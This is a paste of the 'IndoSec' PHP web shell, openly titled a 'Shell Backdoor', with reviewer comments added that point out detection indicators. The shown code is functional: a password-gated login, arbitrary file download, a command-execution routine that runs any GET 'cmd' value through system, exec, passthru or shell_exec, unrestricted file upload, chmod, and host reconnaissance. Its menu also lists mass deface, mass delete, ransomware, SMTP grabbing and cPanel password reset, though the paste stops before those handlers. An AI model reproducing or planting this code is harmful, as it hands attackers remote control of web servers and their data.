shamp0erna99

Indosec - webshell

Jul 5th, 2020
  1. <?php
  // Request bootstrap: runs on every request, before the login check further down.
  // A session is started (it later holds the "logged in" marker), PHP error reporting,
  // error display and error logging are switched off for this request, and the
  // execution time limit is removed. NOTE(review): because of this, PHP error logs are
  // unlikely to show this script's activity; web-server access logs and file-integrity
  // monitoring are the more reliable sources.
  2. session_start();
  3. error_reporting(0);
  4. @set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11.  
  12. /* Configuration (original comment: "Configurasi") */
  // $aupas is a 32-hex-character value that the login check compares with
  // md5($_POST['pass']), i.e. an unsalted MD5 of the access password. It is a fixed
  // literal in this copy of the file, so it can serve as a content-match indicator when
  // scanning web roots.
  13. $aupas = "54062f3bf6377d42b4fab7c8fedfc7da";// IndoSec
  // The next three settings are not read anywhere in the visible part of this listing.
  // NOTE(review): the same names and the 'FilesMan' value are known from other PHP web
  // shells, so they were presumably carried over; a match on them is a generic web-shell
  // hint rather than something specific to this file.
  14. $default_action = 'FilesMan';
  15. $default_use_ajax = true;
  16. $default_charset = 'UTF-8';
  17. date_default_timezone_set("Asia/Jakarta");
  /**
   * Prints the password prompt and ends the request.
   *
   * Emits a static HTML page containing one POST form whose only field is a password
   * input named "pass" (its placeholder reads "User Id..."), then calls exit, so nothing
   * after the call site runs for a request that has not passed the login check.
   *
   * Detection notes: the title, headings and footer are fixed strings, and the page makes
   * the visiting browser fetch an icon and stylesheets from the third-party hosts named
   * in the <link> tags.
   */
  18. function login_shell() {
  19. ?>
  20. <!DOCTYPE html>
  21. <html>
  22. <head>
  23. <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
  24. <meta name="theme-color" content="#343a40"/>
  25. <meta name="author" content="Holiq"/>
  26. <meta name="copyright" content="{ IndoSec }"/>
  27. <title>{ IndoSec sHell }</title>
  28. <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
  29. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
  30. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
  31. </head>
  32. <body class="bg-dark text-center text-light">
  33. <div class="container text-center mt-3">
  34. <h1>{ INDOSEC }</h1>
  35. <h5>sHell Backdoor</h5><hr/>
  36. <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p>
  37. <form method="post">
  38. <div class="form-group input-group">
  39. <div class="input-group-prepend">
  40. <div class="input-group-text"><i class="fa fa-user"></i></div>
  41. </div>
  42. <input type="password" name="pass" placeholder="User Id..." class="form-control">
  43. </div>
  44. <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
  45. </form>
  46. </div>
  47. <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a>
  48. </body>
  49. </html>
  50. <?php
  // Stop here so that no later part of the script is reached without a login.
  51. exit;
  52. }
  // Login gate. The "logged in" marker is a session entry whose key is the MD5 of the
  // request's Host header. When the marker is missing, the request must carry a POST
  // field "pass" whose MD5 equals $aupas; on a match the marker is set and execution
  // continues, in every other case login_shell() prints the prompt and exits.
  // Detection: a POST carrying only "pass" to a PHP file that has no reason to accept
  // logins, followed by requests to the same path that present the session cookie.
  53. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){
  54. if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){
  55. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  56. }else{
  57. login_shell();
  58. }
  59. }
  60. /*
  61. * End of login (original comment: "Akhir Login")
  62. *
  63. * Download action (original comment: "Aksi Download")
  64. */
  // When GET "file" is non-empty and GET "aksi" is "download", the named file is sent
  // back as an attachment and the request ends. The path is used exactly as supplied;
  // no base directory is enforced, so any file readable by the PHP process can be
  // returned. This code is reached only after the login gate.
  // Detection/mitigation: access-log entries carrying aksi=download together with a
  // file= path; an open_basedir restriction limits what readfile() can open.
  65. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')) {
  66. @ob_clean();
  67. $file = $_GET['file'];
  68. header('Content-Description: File Transfer');
  69. header('Content-Type: application/octet-stream');
  70. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  71. header('Expires: 0');
  72. header('Cache-Control: must-revalidate');
  73. header('Pragma: public');
  74. header('Content-Length: ' . filesize($file));
  75. readfile($file);
  76. exit;
  77. }
  /**
   * Wraps a permission string in a <font> tag coloured by writability.
   *
   * @param string $dir  Path tested with is_writable().
   * @param string $perm Text to wrap; inserted into the markup without escaping.
   * @return string Red markup when the path is not writable, lime markup otherwise.
   */
  78. function w($dir,$perm) {
  79. if(!is_writable($dir)) {
  80. return "<font color='red'>".$perm."</font>";
  81. }else{
  82. return "<font color='lime'>".$perm."</font>";
  83. }
  84. }
  /**
   * Wraps a permission string in a <font> tag coloured by readability.
   *
   * @param string $dir  Path tested with is_readable().
   * @param string $perm Text to wrap; inserted into the markup without escaping.
   * @return string Red markup when the path is not readable, lime markup otherwise.
   */
  85. function r($dir,$perm) {
  86. if(!is_readable($dir)) {
  87. return "<font color=red>".$perm."</font>";
  88. } else {
  89. return "<font color=lime>".$perm."</font>";
  90. }
  91. }
  92.  
  /**
   * Runs a command line on the host and returns what it printed.
   *
   * Uses the first of system(), exec(), passthru() and shell_exec() for which
   * function_exists() is true. Output of system()/passthru() is captured through output
   * buffering; exec() output lines are joined with no separator. When none of the four
   * is available the function falls through and returns nothing (null).
   *
   * Defender notes: $cmd is handed over unchanged, and the only guard in front of the
   * callers in this listing is the login gate. Listing these four functions in the
   * php.ini disable_functions directive closes this path; shell processes started by
   * the web-server/PHP user are the host-level signal to monitor.
   *
   * @param string $cmd Command line, passed through unmodified.
   * @return mixed Captured output, or null when no execution function is available.
   */
  93. function exe($cmd) {
  94. if(function_exists('system')) {
  95. @ob_start();
  96. @system($cmd);
  97. $buff = @ob_get_contents();
  98. @ob_end_clean();
  99. return $buff;
  100. } elseif(function_exists('exec')) {
  101. @exec($cmd,$results);
  102. $buff = "";
  103. foreach($results as $result) {
  104. $buff .= $result;
  105. } return $buff;
  106. } elseif(function_exists('passthru')) {
  107. @ob_start();
  108. @passthru($cmd);
  109. $buff = @ob_get_contents();
  110. @ob_end_clean();
  111. return $buff;
  112. } elseif(function_exists('shell_exec')) {
  113. $buff = @shell_exec($cmd);
  114. return $buff;
  115. }
  116. }
  117.  
  /**
   * Formats the mode of a file as a ten-character symbolic string.
   *
   * The first character is the file type taken from the high bits of fileperms()
   * (s, l, -, b, d, c, p, or u for unknown); the remaining nine are the owner, group and
   * world read/write/execute flags, with setuid/setgid shown as s/S and the sticky bit
   * as t/T.
   *
   * @param string $file Path passed to fileperms().
   * @return string Symbolic mode string built from the bit tests below.
   */
  118. function perms($file){
  119. $perms = fileperms($file);
  120. if (($perms & 0xC000) == 0xC000) {
  121. // Socket
  122. $info = 's';
  123. } elseif (($perms & 0xA000) == 0xA000) {
  124. // Symbolic Link
  125. $info = 'l';
  126. } elseif (($perms & 0x8000) == 0x8000) {
  127. // Regular
  128. $info = '-';
  129. } elseif (($perms & 0x6000) == 0x6000) {
  130. // Block special
  131. $info = 'b';
  132. } elseif (($perms & 0x4000) == 0x4000) {
  133. // Directory
  134. $info = 'd';
  135. } elseif (($perms & 0x2000) == 0x2000) {
  136. // Character special
  137. $info = 'c';
  138. } elseif (($perms & 0x1000) == 0x1000) {
  139. // FIFO pipe
  140. $info = 'p';
  141. } else {
  142. // Unknown
  143. $info = 'u';
  144. }
  145.  
  146. // Owner
  147. $info .= (($perms & 0x0100) ? 'r' : '-');
  148. $info .= (($perms & 0x0080) ? 'w' : '-');
  149. $info .= (($perms & 0x0040) ?
  150. (($perms & 0x0800) ? 's' : 'x' ) :
  151. (($perms & 0x0800) ? 'S' : '-'));
  152. // Group
  153. $info .= (($perms & 0x0020) ? 'r' : '-');
  154. $info .= (($perms & 0x0010) ? 'w' : '-');
  155. $info .= (($perms & 0x0008) ?
  156. (($perms & 0x0400) ? 's' : 'x' ) :
  157. (($perms & 0x0400) ? 'S' : '-'));
  158.  
  159. // World
  160. $info .= (($perms & 0x0004) ? 'r' : '-');
  161. $info .= (($perms & 0x0002) ? 'w' : '-');
  162. $info .= (($perms & 0x0001) ?
  163. (($perms & 0x0200) ? 't' : 'x' ) :
  164. (($perms & 0x0200) ? 'T' : '-'));
  165.  
  166. return $info;
  167. }
  168.  
  // NOTE(review): $path is read here but is not assigned anywhere in the visible part of
  // the listing, and $paths is not used in it either.
  169. $path = str_replace('\\','/',$path);
  170. $paths = explode('/',$path);
  // GET "dir" chooses the working directory for the rest of the request; the value is
  // handed to chdir() unchanged. Without it the current directory is used.
  171. if(isset($_GET['dir'])) {
  172. $dir = $_GET['dir'];
  173. chdir($dir);
  174. } else {
  175. $dir = getcwd();
  176. }
  177.  
  // Host survey for the information panel printed later: OS string, the address the
  // local host name resolves to, PHP version, Host header, server software, whether
  // mysql_connect/curl_version/mail exist, disk totals for $dir, and the value of the
  // disable_functions directive.
  178. $os = php_uname();
  179. $ip = getHostByName(getHostName());
  180. $ver = phpversion();
  181. $web = $_SERVER['HTTP_HOST'];
  182. $sof = $_SERVER['SERVER_SOFTWARE'];
  183. $dir = str_replace("\\","/",$dir);
  184. $scdir = explode("/", $dir);
  185. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  186. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  187. $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  188. $total = disk_total_space($dir);
  189. $free = disk_free_space($dir);
  // Free space as a whole-number percentage of the total.
  190. $pers = (int) ($free/$total*100);
  191. $ds = @ini_get("disable_functions");
  // $dir and $ds are placed into the link markup without HTML escaping.
  192. $show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>";
  // Icon markup pointing at fixed third-party image URLs (plain http).
  193. $imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>";
  194. $imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>";
  /**
   * Formats a byte count with a binary unit suffix.
   *
   * Divides by 1024 until the value is below 1024 or the largest unit (TB) is reached,
   * then rounds to two decimals.
   *
   * @param int|float $bytes Size in bytes.
   * @return string Rounded value, a space, and one of B, KB, MB, GB, TB.
   */
  195. function formatSize( $bytes ) {
  196. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
  // Empty-bodied loop: all the work happens in the loop header.
  197. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
  198. return( round( $bytes, 2 )." ".$types[$i] );
  199. }
  200.  
  /**
   * Extracts the text between two markers ("ambil kata" is Indonesian for "take word").
   *
   * Returns FALSE when either marker does not occur anywhere in $param. Otherwise the
   * result starts right after the first occurrence of $kata1 and runs up to the next
   * occurrence of $kata2 found from that position. Not called in the visible part of
   * this listing.
   *
   * @param string $param Text to search.
   * @param string $kata1 Opening marker.
   * @param string $kata2 Closing marker.
   * @return string|false Text between the markers, or FALSE when a marker is missing.
   */
  201. function ambilKata($param, $kata1, $kata2){
  202. if(strpos($param, $kata1) === FALSE) return FALSE;
  203. if(strpos($param, $kata2) === FALSE) return FALSE;
  204. $start = strpos($param, $kata1) + strlen($kata1);
  205. $end = strpos($param, $kata2, $start);
  206. $return = substr($param, $start, $end - $start);
  207. return $return;
  208. }
  209.  
  // Counts the zone entries in /etc/named.conf (the BIND name-server configuration) to
  // show how many domains are configured on the host. When the file cannot be read,
  // $die receives an error snippet and $dom stays unset; when it can, $dom receives
  // "<count> Domain" and $die stays unset. The "need_to_update_header" global is only
  // written, never read, in the visible part of the listing.
  // Detection/mitigation: reads of /etc/named.conf by the web-server/PHP user are
  // uncommon and can be audited; an open_basedir restriction blocks the read.
  210. $d0mains = @file("/etc/named.conf", false);
  211. if (!$d0mains) {
  212. $die = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
  213. $GLOBALS["need_to_update_header"] = "true";
  214. }else{
  215. $count = 0;
  216. foreach ($d0mains as $d0main) {
  217. if (@strstr($d0main, "zone")) {
  218. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  219. flush();
  // Only zone names longer than two characters are counted.
  220. if (strlen(trim($domains[1][0])) > 2) {
  221. flush();
  222. $count++;
  223. }
  224. }
  225. }
  226. $dom = "$count Domain";
  227. }
  /**
   * Prints a <script> that shows a SweetAlert2 dialog and then navigates to ?dir=$dir.
   *
   * $swa is used both as the dialog title and as its type. All three arguments are
   * interpolated into the script text as-is, with no JavaScript or URL escaping.
   *
   * @param string $swa  Dialog type and title; callers pass "success" or "error".
   * @param string $text Dialog message.
   * @param string $dir  Directory placed in the redirect URL.
   * @return void
   */
  228. function swall($swa,$text,$dir){
  229. echo "<script>Swal.fire({
  230. title: '$swa',
  231. text: '$text',
  232. type: '$swa',
  233.  
  234. }).then((value) => {window.location='?dir=$dir';})</script>";
  235. }
  236. ?>
  237. <html>
  238. <head>
  239. <meta name="viewport" content="widht=device-widht, initial-scale=1"/>
  240. <meta name="theme-color" content="#343a40"/>
  241. <meta name="author" content="Holiq"/>
  242. <meta name="copyright" content="{ IndoSec }"/>
  243. <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
  244. <title>{ IndoSec sHell }</title>
  245. <link rel="stylesheet" href="pojan/assets/css/bootstrap.min.css">
  246. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
  247. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"/>
  248. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"/>
  249. <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
  250. <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
  251. <script src="https://cdn.jsdelivr.net/npm/sweetalert2@8.18.0/dist/sweetalert2.all.min.js"></script>
  252. </head>
  253. <body class="bg-dark text-light">
  254. <script>
  255. $(document).ready(function(){
  256. $(window).scroll(function(){
  257. if ($(this).scrollTop() > 700) {
  258. $(".scrollToTop").fadeIn();
  259. }else{
  260. $(".scrollToTop").fadeOut();
  261. }
  262. });
  263. $(".scrollToTop").click(function(){
  264. $("html, body").animate({scrollTop : 0},1000);
  265. return false;
  266. });
  267. });
  268. $(document).ready(function() {
  269. $('input[type="file"]').on("change", function() {
  270. let filenames = [];
  271. let files = document.getElementById("customFile").files;
  272. if (files.length > 1) {
  273. filenames.push("Total Files (" + files.length + ")");
  274. } else {
  275. for (let i in files) {
  276. if (files.hasOwnProperty(i)) {
  277. filenames.push(files[i].name);
  278. }
  279. }
  280. }
  281. $(this).next(".custom-file-label").html(filenames.join(","));
  282. });
  283. });
  284. var max_fields = 5;
  285. var x = 1;
  286. $(document).on('click', '#add_input', function(e){
  287. if(x < max_fields){
  288. x++;
  289. $('#output').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_file[]\" placeholder=\"Nama File...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
  290. }
  291. $('#output').on("click",".remove", function(e){
  292. e.preventDefault(); $(this).parent('#out').remove(); x--;
  293. repeat();
  294. })
  295. });
  296. $(document).on('click', '#add_input1', function(e){
  297. if(x < max_fields){
  298. x++;
  299. $('#output1').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_folder[]\" placeholder=\"Nama Folder...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
  300. }
  301. $('#output1').on("click",".remove", function(e){
  302. e.preventDefault(); $(this).parent('#out').remove(); x--;
  303. repeat();
  304. })
  305. });
  306.  
  307. </script>
  308. <style>
  309. @import url(https://fonts.googleapis.com/css?family=Lato);
  310. @import url(https://fonts.googleapis.com/css?family=Quicksand);
  311. @import url(https://fonts.googleapis.com/css?family=Inconsolata);
  312. input[type="text"],textarea {font-family: "Inconsolata", monospace;}
  313. body{margin:0;padding:0;font-family:"Lato";overscroll-behavior:none;}
  314. .infor{font-size:14px;color:#333!important;}
  315. .ds{color:#f00!important;word-wrap:break-word;}
  316. #tab table thead th{padding:5px;font-size:16px;white-space: nowrap;}
  317. #tab tr {border-bottom:1px solid #ccc;}
  318. #tab tr:hover{background:#5B6F7D;color:#fff;}
  319. #tab tr td{padding:5px 10px;white-space:nowrap;}
  320. .pinggir{text-align:left !important; padding-left: 4px !important;}
  321. #tab tr td .badge{font-size:13px;}
  322. .active,.active:hover{color:#00FF00;}
  323. a {font-family:"Quicksand"; color:white;}
  324. a:hover{color:dodgerBlue;}
  325. .badge{width:30px;transition:.3s;}
  326. .badge:hover{transform: scale(1.1);transition:.3s;}
  327. .ico {width:25px;}
  328. .ico2{width:30px;}
  329. @media(min-width:767px){.scrollToTop{display:none !important;}}
  330. .scrollToTop{
  331. position:fixed;
  332. bottom:30px;
  333. right:30px;
  334. width:35px;
  335. height:35px;
  336. background:#262626;
  337. color:#fff;
  338. border-radius:15%;
  339. text-align:center;
  340. opacity:.5;
  341. }
  342. .scrollToTop:hover{color:#fff;}
  343. .up{font-size:25px;line-height:35px;}
  344. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
  345. .lain:hover{color:#fff;}
  346. .tambah{
  347. width:35px;
  348. height:35px;
  349. line-height:35px;
  350. border:1px solid;
  351. border-radius:50%;
  352. text-align:center;
  353. }
  354. .fiture{margin:3px;}
  355. .tmp th {font-size:14px;}
  356. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;padding:2px 5px;}
  357. .tmp tr:hover{background:#5B6F7D; color:#fff;}
  358. .about{color:#000;}
  359. .about .card-body .img{
  360. position: relative;
  361. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
  362. background-size: cover;
  363. width: 150px;
  364. height: 150px;
  365. }
  366. .butn {
  367. position: relative;
  368. text-align: center;
  369. padding: 3px;
  370. background:rgba(225,225,225,.3);
  371. -webkit-transition: background 300ms ease, color 300ms ease;
  372. transition: background 300ms ease, color 300ms ease;
  373. }
  374. input[type="radio"].toggle {display:none;}
  375. input[type="radio"].toggle + label {cursor:pointer;margin:0 2px;width:60px;}
  376. input[type="radio"].toggle + label:after {
  377. position: absolute;
  378. content: "";
  379. top: 0;
  380. background: #fff;
  381. height: 100%;
  382. width: 100%;
  383. z-index: -1;
  384. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  385. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  386. }
  387. input[type="radio"].toggle.toggle-left + label:after {left:100%;}
  388. input[type="radio"].toggle.toggle-right + label {margin-left:-5px;}
  389. input[type="radio"].toggle.toggle-right + label:after {left:-100%;}
  390. input[type="radio"].toggle:checked + label {cursor:default;color:#000;-webkit-transition:color 400ms;transition: color 400ms;}
  391. input[type="radio"].toggle:checked + label:after {left:0;}
  392. </style>
  393. <nav class="navbar static-top navbar-dark">
  394. <button class="navbar-toggler"type="button" data-toggle="collapse" data-target="#info" aria-label="Toggle navigation">
  395. <i style="color:#fff;" class="fa fa-navicon"></i>
  396. </button>
  397. <div class="collapse navbar-collapse" id="info">
  398. <ul>
  399. <a href="https://facebook.com/IndoSecOfficial" class="lain"><i class="fa fa-facebook tambah"></i></a>
  400. <a href="https://www.instagram.com/indosec.id" class="lain"><i class="fa fa-instagram tambah"></i></a>
  401. <a href="https://www.youtube.com/IndoSec" class="lain"><i class="fa fa-youtube-play tambah"></i></a>
  402. <a href="https://github.com/indosecid" class="lain"><i class="fa fa-github tambah"></i></a>
  403. <a href="https://indosec.web.id" class="lain"><i class="fa fa-globe tambah"></i></a>
  404. </ul>
  405. </div>
  406. </nav>
  407. <?php
  // Prints the page header: the feature menu, the command input and the host-information
  // table. Every menu link carries the current directory plus an "aksi" value naming the
  // feature. The values visible here are upload, buat_file, buat_folder, masdef, masdel,
  // jumping, config, adminer, symlink, bctools, resetpasscp, auteduser, ransom, smtpgrab,
  // bypascf and zip_menu; "about" and "keluar" are bare parameters and "cmd" is the
  // field of the command form (a GET form, so the value ends up in the query string).
  // These parameter names are useful search terms for web-server access logs.
  // $dir, $sof and the other values are concatenated into the markup without escaping.
  408. echo '
  409. <div class="container">
  410. <h1 class="text-center"><a href="https://facebook.com/IndoSecOfficial" style="color:#ffffff;">{ INDOSEC }</h1>
  411. <center><h5>Shell Backdoor</a></h5></center>
  412. <hr/>
  413. <div class="text-center">
  414. <div class="d-flex justify-content-center flex-wrap">
  415. <a href="?" class="fiture btn btn-danger btn-sm"><i class="fa fa-home"></i> Home</a>
  416. <a href="?dir='.$dir.'&aksi=upload" class="fiture btn btn-danger btn-sm"><i class="fa fa-upload"></i> Upload</a>
  417. <a href="?dir='.$dir.'&aksi=buat_file" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus-circle"></i> Buat File</a>
  418. <a href="?dir='.$dir.'&aksi=buat_folder" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus"></i> Buat Folder</a>
  419. <a href="?dir='.$dir.'&aksi=masdef" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Mass Deface</a>
  420. <a href="?dir='.$dir.'&aksi=masdel" class="fiture btn btn-danger btn-sm"><i class="fa fa-trash"></i> Mass Delete</a>
  421. <a href="?dir='.$dir.'&aksi=jumping" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Jumping</a>
  422. <a href="?dir='.$dir.'&aksi=config" class="fiture btn btn-danger btn-sm"><i class="fa fa-cogs"></i> Config</a>
  423. <a href="?dir='.$dir.'&aksi=adminer" class="fiture btn btn-danger btn-sm"><i class="fa fa-user"></i> Adminer</a>
  424. <a href="?dir='.$dir.'&aksi=symlink" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-circle"></i> Symlink</a>
  425. <a href="?dir='.$dir.'&aksi=bctools" class="fiture btn btn-danger btn-sm"><i class="fas fa-network-wired"></i> Network</a>
  426. <a href="?dir='.$dir.'&aksi=resetpasscp" class="fiture btn btn-warning btn-sm"><i class="fa fa-key"></i> Auto Reset Cpanel</a>
  427. <a href="?dir='.$dir.'&aksi=auteduser" class="fiture btn btn-warning btn-sm"><i class="fas fa-user-edit"></i> Auto Edit User</a>
  428. <a href="?dir='.$dir.'&aksi=ransom" class="fiture btn btn-warning btn-sm"><i class="fab fa-keycdn"></i> Ransomware</a>
  429. <a href="?dir='.$dir.'&aksi=smtpgrab" class="fiture btn btn-warning btn-sm"><i class="fas fa fa-exclamation-circle"></i> SMTP Grabber</a>
  430. <a href="?dir='.$dir.'&aksi=bypascf" class="fiture btn btn-warning btn-sm"><i class="fas fa-cloud"></i> Bypass Cloud Flare</a>
  431. <a href="?dir='.$dir.'&aksi=zip_menu" class="fiture btn btn-warning btn-sm"><i class="fa fa-file-archive-o"></i> Zip Menu</a>
  432. <a href="?about" class="fiture btn btn-warning btn-sm"><i class="fa fa-info"></i> About Us</a>
  433. <a href="?keluar" class="fiture btn btn-warning btn-sm"><i class="fa fa-sign-out"></i> keluar</a>
  434. </div>
  435. </div>
  436. <div class="row">
  437. <div class="col-md-5"><br/>
  438. <h5><i class="fa fa-terminal"></i>Terminal : </h5>
  439. <form>
  440. <input type="text" class="form-control" name="cmd" autocomplete="off" placeholder="id | uname -a | whoami | heked">
  441. </form>
  442. <hr/>
  443. <h5><i class="fa fa-search"></i> Informasi : </h5>
  444. <div class="card table-responsive">
  445. <div class="card-body">
  446. <table class="table infor">
  447. <tr>
  448. <td>PHP</td>
  449. <td> : '.$ver.'</td>
  450. </tr>
  451. <tr>
  452. <td>IP Server</td>
  453. <td> : '.$ip.'</td>
  454. </tr>
  455. <tr>
  456. <td>HDD</td>
  457. <td class="d-flex">Total : '.formatSize($total).' Free : '.formatSize($free).' ['.$pers.'%]</td>
  458. </tr>
  459. <tr>
  460. <td>Domain</td>
  461. <td>: '.$dom.''.$die.'</td>
  462. </tr>
  463. <tr>
  464. <td>MySQL</td>
  465. <td>: '.$mysql.'</td>
  466. </tr>
  467. <tr>
  468. <td>cURL</td>
  469. <td>: '.$curl.'</td>
  470. </tr>
  471. <tr>
  472. <td>Mailer</td>
  473. <td>: '.$mail.'</td>
  474. </tr>
  475. <tr>
  476. <td>Disable Function</td>
  477. <td>: '.$show_ds.'</td>
  478. </tr>
  479. <tr>
  480. <td>Software</td>
  481. <td>: '.$sof.'</td>
  482. </tr>
  483. <tr>
  484. <td>Sistem Operasi</td>
  485. <td> : '.$os.'</td>
  486. </tr>
  487. </table>
  488. </div>
  489. </div><hr/>
  490. </div>
  491. <div class="col-md-7 mt-4">';
  492.  
  493. // log out (original comment: "keluar")
  // Destroys the session, which removes the login marker, and redirects the browser to
  // "?". No exit follows, so the remainder of the script still runs for this request.
  494. if (isset($_GET['keluar'])) {
  495. session_start();
  496. session_destroy();
  497. echo '<script>window.location="?";</script>';
  498. }
  499.  
  500. // command execution (original comment: "cmd")
  // Passes GET "cmd" to exe() and prints the result inside <pre> without HTML escaping,
  // then ends the request. Because the command travels in the query string it is
  // recorded in web-server access logs: requests to this path with a cmd= parameter are
  // a direct indicator, as are shell processes started by the web-server/PHP user.
  501. if(isset($_GET['cmd'])){
  502. echo "<pre class='text-white'>".exe($_GET['cmd'])."</pre>";
  503. exit;
  504. }
  505.  
  506. //about
  // Prints a static "about" card and ends the request. The Indonesian sentence describes
  // IndoSec as a community focused on technology in Indonesia, covering building,
  // securing and exploiting systems.
  507. if (isset($_GET['about'])) {
  508. echo '<div class="card text-center bg-light about">
  509. <h4 class="card-header">{ IndoSec }</h4>
  510. <div class="card-body">
  511. <center><div class="img"></div></center>
  512. <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
  513. </div>
  514. <div class="card-footer">
  515. <small class="card-text text-muted">Copyright 2019 { IndoSec }</small>
  516. </div>
  517. </div><br/>';
  518. exit;
  519. }
  520.  
  521. //upload
  // Prints a multi-file upload form. On POST "upload" each uploaded temporary file is
  // copied to "$dir/<client-supplied file name>" with copy(). The client file name is
  // used unchanged (no basename(), no type or content check), and neither
  // is_uploaded_file() nor move_uploaded_file() is involved.
  // Detection: multipart POSTs to this path with aksi=upload, and new files appearing
  // in directories writable by the web-server user.
  522. if ($_GET['aksi'] == 'upload') {
  523. echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader">
  524. <div class="card">
  525. <div class="card-body form-group">
  526. <p class="text-muted">//Multiple Upload</p>
  527. <div class="custom-file">
  528. <input type="file" name="file[]" multiple class="custom-file-input" id="customFile">
  529. <label class="custom-file-label" for="customFile">Choose file</label>
  530. </div>
  531. <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload">
  532. </div>
  533. </div>
  534. </form>';
  535.  
  536. if(isset($_POST['upload'])){
  // $jumlah ("count") is the number of files in the request.
  537. $jumlah = count($_FILES['file']['name']);
  538. for($i=0;$i<$jumlah;$i++){
  539. $filename = $_FILES['file']['name'][$i];
  540.  
  541. $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename);
  542.  
  543. }
  // With a single file the dialog reflects the copy() result; with two or more files
  // "success" is shown regardless of the individual results.
  544. if($jumlah < 2) {
  545. if($up){
  546. $swa = "success";
  547. $text = "Berhasil Upload $filename";
  548. swall($swa,$text,$dir);
  549. }else{
  550. $swa = "error";
  551. $text = "Gagal Upload File";
  552. swall($swa,$text,$dir);
  553. }
  554. }else{
  555. $swa = "success";
  556. $text = "Berhasil Upload $jumlah File";
  557. swall($swa,$text,$dir);
  558. }
  559. }
  560. }
  561.  
  562. // open file (original comment: "openfile")
  // $file is the raw GET "file" value shared by the per-file actions below; $nfile is
  // its base name, used for display. When GET "file" is absent, $file is whatever an
  // earlier statement left in it (unset in the visible part of the listing).
  563. if (isset($_GET['file'])) {
  564. $file = $_GET['file'];
  565. }
  566. $nfile = basename($file);
  567. //chmod
  // Shows the current mode of GET "file" (last four octal digits) in a form and, on
  // POST "perm", calls chmod() on that path with the submitted value.
  // NOTE(review): the form value reaches chmod() as a string, which PHP presumably
  // converts as a decimal number rather than octal; unexpected mode bits on files in the
  // web root can therefore be a forensic artifact of this handler — confirm on a sample.
  568. if($_GET['aksi'] == 'chmod_file') {
  569. echo "<form method='POST'>
  570. <h5>Chmod File : $nfile </h5>
  571. <div class='form-group input-group'>
  572. <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'>
  573. <input type='submit' class='btn btn-danger form-control' value='Chmod'>
  574. </div>
  575. </form>";
  576.  
  577. if(isset($_POST['perm'])){
  578. if(@chmod($_GET['file'],$_POST['perm'])){
  579. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  580. }else{
  581. echo '<font color="white">Change Permission Gagal</font><br/>';
  582. }
  583. }
  584. }
  585.  
  586. // create file (original comment: "buat_file")
